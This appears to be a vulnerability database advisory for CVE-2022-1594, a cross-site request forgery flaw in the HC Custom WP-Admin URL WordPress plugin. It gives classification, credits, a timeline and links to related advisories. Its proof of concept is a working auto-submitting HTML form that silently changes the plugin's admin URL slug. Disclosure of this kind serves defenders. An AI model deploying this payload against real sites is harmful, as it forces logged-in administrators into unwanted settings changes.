HC Custom WP-Admin URL <= 1.4 – Unauthenticated Arbitrary Settings Update via CSRF | CVE 2022-1594

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="custom_wpadmin_slug" value="secret">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

hc-custom-wp-admin-url

No known fix

References

CVE

CVE-2022-1594

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

CVSS

5.4 (medium)

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

bb0efc5e-044b-47dc-9101-9aae40cdbaa5

Timeline

Publicly Published

2022-05-18 (about 3 years ago)

Added

2022-05-18 (about 3 years ago)

Last Updated

2023-02-09 (about 2 years ago)

Other

Published

Title

Published

2025-04-09

Title

Spoiler Block <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-04-11

Title

Sync Post With Other Site < 1.5.2 - Cross-Site Request Forgery

Published

2023-09-12

Title

Quiz And Survey Master < 8.1.16 - Cross-Site Request Forgery via 'display_results'

Published

2024-11-22

Title

Kevin's <= 2.0.0 - Cross-Site Request Forgery

Published

2024-06-28

Title

Uncanny Toolkit Pro for LearnDash < 4.1.4.1 - Cross-Site Request Forgery